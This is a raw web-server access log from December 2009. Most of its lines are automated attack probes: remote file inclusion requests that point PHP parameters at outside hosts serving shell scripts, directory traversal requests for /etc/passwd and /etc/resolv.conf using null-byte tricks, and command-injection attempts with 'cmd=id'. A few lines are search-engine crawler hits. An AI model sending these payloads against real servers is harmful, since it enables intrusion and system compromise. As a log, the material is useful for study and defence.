110.45.147.248 - - [15/Dec/2009:21:08:44 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:08:44 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:08:44 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:08:44 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:09:51 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:51 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:52 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:52 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:52 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:53 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:53 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:53 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:09:59 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.147.248 - - [15/Dec/2009:21:10:00 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
122.201.81.160 - - [15/Dec/2009:21:11:02 -0600] "GET /logs/access_log.1228608000/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 356 "-""-"
110.45.147.248 - - [15/Dec/2009:21:11:54 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:54 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:54 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:54 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:56 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:11:56 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
124.49.100.254 - - [15/Dec/2009:21:17:39 -0600] "GET /logs/access_log.1249344000/?prefix=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [15/Dec/2009:21:17:40 -0600] "GET /?prefix=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
124.49.100.254 - - [15/Dec/2009:21:17:41 -0600] "GET /logs/?prefix=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
124.49.100.254 - - [15/Dec/2009:21:18:10 -0600] "GET /logs/access_log.1254528000/?prefix=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.173.34 - - [15/Dec/2009:21:18:52 -0600] "GET /logs/index2.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.19.173.34 - - [15/Dec/2009:21:18:52 -0600] "GET /index2.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.75.60.213 - - [15/Dec/2009:21:20:24 -0600] "GET /logs/index2.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.75.60.213 - - [15/Dec/2009:21:20:25 -0600] "GET /index2.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.207.122 - - [15/Dec/2009:21:25:38 -0600] "GET /logs/access_log.1192924800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.124.224.98 - - [15/Dec/2009:21:27:04 -0600] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
64.124.224.98 - - [15/Dec/2009:21:27:04 -0600] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
78.110.50.121 - - [15/Dec/2009:21:27:09 -0600] "GET /logs/access_log.1250294400///skin/sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:21:27:09 -0600] "GET /logs///skin/sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:21:27:09 -0600] "GET ///skin/sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:21:27:22 -0600] "GET /logs/access_log.1252713600///skin/sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
80.55.55.178 - - [15/Dec/2009:21:30:28 -0600] "GET /logs/access_log.1240272000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.207.76 - - [15/Dec/2009:21:30:39 -0600] "GET /logs/access_log.1217376000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.17.220.190 - - [15/Dec/2009:21:31:32 -0600] "GET //skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.17.220.190 - - [15/Dec/2009:21:31:32 -0600] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.17.220.190 - - [15/Dec/2009:21:31:32 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.17.220.190 - - [15/Dec/2009:21:31:32 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.145.186.178 - - [15/Dec/2009:21:33:58 -0600] "GET /logs/access_log.1250812800 HTTP/1.1" 200 634019 "-"".NET Framework/2.0"
74.86.82.218 - - [15/Dec/2009:21:34:25 -0600] "GET /active/components/xmlrpc/client.php?c[components]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 318 "-""-"
216.145.186.178 - - [15/Dec/2009:21:35:14 -0600] "GET /logs/access_log.1249603200 HTTP/1.1" 200 486821 "-"".NET Framework/2.0"
110.45.147.248 - - [15/Dec/2009:21:41:30 -0600] "GET /logs/access_log.1240272000//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:41:35 -0600] "GET /logs/access_log.1240272000//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
65.55.107.182 - - [15/Dec/2009:21:41:38 -0600] "GET /logs/access_log.1148860800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.147.248 - - [15/Dec/2009:21:41:46 -0600] "GET /logs/access_log.1240272000//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:41:51 -0600] "GET /logs/access_log.1240272000//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.147.248 - - [15/Dec/2009:21:42:00 -0600] "GET /logs/access_log.1240272000//include/admin.lib.inc.php?site_path=http://post232.com/images/pw.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
65.55.106.228 - - [15/Dec/2009:21:42:08 -0600] "GET /?D=D HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.201.81.160 - - [15/Dec/2009:21:48:12 -0600] "GET /logs/access/login.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 304 "-""-"
122.201.81.160 - - [15/Dec/2009:21:48:12 -0600] "GET /access/login.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 299 "-""-"
122.201.81.160 - - [15/Dec/2009:21:48:12 -0600] "GET /access/login.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 299 "-""-"
122.201.81.160 - - [15/Dec/2009:21:48:16 -0600] "GET /logs/access/login.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 304 "-""-"
216.145.186.178 - - [15/Dec/2009:21:51:27 -0600] "GET /logs/access_log.1243641600 HTTP/1.1" 200 795445 "-"".NET Framework/2.0"
65.55.207.93 - - [15/Dec/2009:21:53:10 -0600] "GET /logs/access_log.1237939200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.52 - - [15/Dec/2009:21:53:10 -0600] "GET /logs/access_log.1254441600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.40.103.14 - - [15/Dec/2009:21:54:13 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
64.40.103.14 - - [15/Dec/2009:21:56:48 -0600] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
65.55.51.112 - - [15/Dec/2009:21:57:26 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.203.208.203 - - [15/Dec/2009:21:58:19 -0600] "GET /setup.php?setup[use_category]=1&dir=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
89.203.208.203 - - [15/Dec/2009:21:58:19 -0600] "GET /logs/access_log.1256860800/setup.php?setup[use_category]=1&dir=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.203.208.203 - - [15/Dec/2009:21:58:19 -0600] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.55.51.112 - - [15/Dec/2009:21:58:25 -0600] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.203.208.203 - - [15/Dec/2009:21:58:31 -0600] "GET /logs/access_log.1253491200/setup.php?setup[use_category]=1&dir=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
200.226.134.29 - - [15/Dec/2009:22:00:28 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=?&cmd=id HTTP/1.1" 404 332 "-""-"
200.226.134.29 - - [15/Dec/2009:22:00:29 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=?&cmd=id HTTP/1.1" 404 327 "-""-"
65.55.106.157 - - [15/Dec/2009:22:01:09 -0600] "GET /logs/access_log.1241049600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.157 - - [15/Dec/2009:22:01:22 -0600] "GET /_vti_cnf/?M=A HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.226.134.29 - - [15/Dec/2009:22:04:03 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=?&cmd=id HTTP/1.1" 404 327 "-""-"
200.93.147.154 - - [15/Dec/2009:22:07:59 -0600] "GET /logs//themes/default/index.php?main=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.226.134.29 - - [15/Dec/2009:22:08:03 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=?&cmd=id HTTP/1.1" 404 332 "-""-"
200.226.134.29 - - [15/Dec/2009:22:08:37 -0600] "GET //components/com_poll/views/poll/tmpl/errors.php?error=?&cmd=id HTTP/1.1" 404 330 "-""-"
200.226.134.29 - - [15/Dec/2009:22:08:37 -0600] "GET /logs//components/com_poll/views/poll/tmpl/errors.php?error=?&cmd=id HTTP/1.1" 404 335 "-""-"
67.19.51.194 - - [15/Dec/2009:22:08:53 -0600] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:08:58 -0600] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:09 -0600] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:09 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:11 -0600] "GET /logs/access_log.1251676800/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:13 -0600] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:16 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:19 -0600] "GET //themes/default/index.php?main=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:24 -0600] "GET /logs/access_log.1246752000//themes/default/index.php?main=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:24 -0600] "GET /logs/access_log.1253577600//themes/default/index.php?main=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:27 -0600] "GET /logs//themes/default/index.php?main=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:31 -0600] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:31 -0600] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:32 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:33 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:34 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:35 -0600] "GET /logs/access_log.1251676800/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:36 -0600] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:41 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:41 -0600] "GET /logs/access_log.1251676800/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [15/Dec/2009:22:09:42 -0600] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:09:45 -0600] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
65.55.106.159 - - [15/Dec/2009:22:09:45 -0600] "GET /logs/access_log.1184803200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.126.99.142 - - [15/Dec/2009:22:10:19 -0600] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
189.126.99.142 - - [15/Dec/2009:22:10:19 -0600] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.126.99.142 - - [15/Dec/2009:22:10:19 -0600] "GET /logs/access_log.1252454400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
189.126.99.142 - - [15/Dec/2009:22:10:30 -0600] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:10:38 -0600] "GET /logs/access_log.1251676800/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:10:39 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.93.147.154 - - [15/Dec/2009:22:10:43 -0600] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
189.126.99.142 - - [15/Dec/2009:22:11:05 -0600] "GET /logs/access_log.1252454400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
189.126.99.142 - - [15/Dec/2009:22:11:05 -0600] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.226.134.29 - - [15/Dec/2009:22:11:39 -0600] "GET //components/com_fabrik/models/table.php?mosConfig_absolute_path=?&cmd=id HTTP/1.1" 404 322 "-""-"
200.226.134.29 - - [15/Dec/2009:22:11:39 -0600] "GET /logs/access_log.1240272000%20//components/com_fabrik/models/table.php?mosConfig_absolute_path=?&cmd=id HTTP/1.1" 404 350 "-""-"
200.226.134.29 - - [15/Dec/2009:22:11:39 -0600] "GET /logs//components/com_fabrik/models/table.php?mosConfig_absolute_path=?&cmd=id HTTP/1.1" 404 327 "-""-"
200.226.134.29 - - [15/Dec/2009:22:13:54 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=?&cmd=id HTTP/1.1" 404 332 "-""-"
200.226.134.29 - - [15/Dec/2009:22:13:54 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=?&cmd=id HTTP/1.1" 404 327 "-""-"
200.226.134.29 - - [15/Dec/2009:22:13:54 -0600] "GET /logs/access_log.1240272000%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=?&cmd=id HTTP/1.1" 404 355 "-""-"
200.226.134.29 - - [15/Dec/2009:22:14:11 -0600] "GET /?dir[func]=&dir[base]=?&cmd=id HTTP/1.1" 200 3245 "-""-"
74.86.82.218 - - [15/Dec/2009:22:15:17 -0600] "GET /logs/active/components/xmlrpc/client.php?c[components]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 323 "-""-"
207.7.92.11 - - [15/Dec/2009:22:18:16 -0600] "GET /logs//login.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 298 "-""-"
207.7.92.11 - - [15/Dec/2009:22:18:16 -0600] "GET //login.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 293 "-""-"
207.7.92.11 - - [15/Dec/2009:22:18:17 -0600] "GET /logs//login.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 298 "-""-"
207.7.92.11 - - [15/Dec/2009:22:18:17 -0600] "GET //login.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 293 "-""-"
74.53.183.210 - - [15/Dec/2009:22:18:31 -0600] "GET /index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [15/Dec/2009:22:18:31 -0600] "GET /index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [15/Dec/2009:22:18:32 -0600] "GET /logs/index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [15/Dec/2009:22:18:32 -0600] "GET /logs/index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
69.16.239.36 - - [15/Dec/2009:22:18:45 -0600] "GET /logs/template.php?name=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 300 "-""-"
69.16.239.36 - - [15/Dec/2009:22:18:45 -0600] "GET /logs/template.php?name=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 300 "-""-"
69.16.239.36 - - [15/Dec/2009:22:18:45 -0600] "GET /template.php?name=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 295 "-""-"
69.16.239.36 - - [15/Dec/2009:22:18:46 -0600] "GET /template.php?name=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 295 "-""-"
207.7.92.11 - - [15/Dec/2009:22:19:00 -0600] "GET /logs/print.php?page=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
207.7.92.11 - - [15/Dec/2009:22:19:00 -0600] "GET /print.php?page=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
67.218.116.131 - - [15/Dec/2009:22:20:58 -0600] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.226.134.29 - - [15/Dec/2009:22:22:38 -0600] "GET //components/com_extcalendar/errors.php?error=?&cmd=id HTTP/1.1" 404 321 "-""-"
78.110.50.121 - - [15/Dec/2009:22:22:47 -0600] "GET /logs/////setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:22:22:47 -0600] "GET /logs/access_log.1250294400/////setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:22:22:47 -0600] "GET /////setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:22:23:02 -0600] "GET /logs/access_log.1252713600/////setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
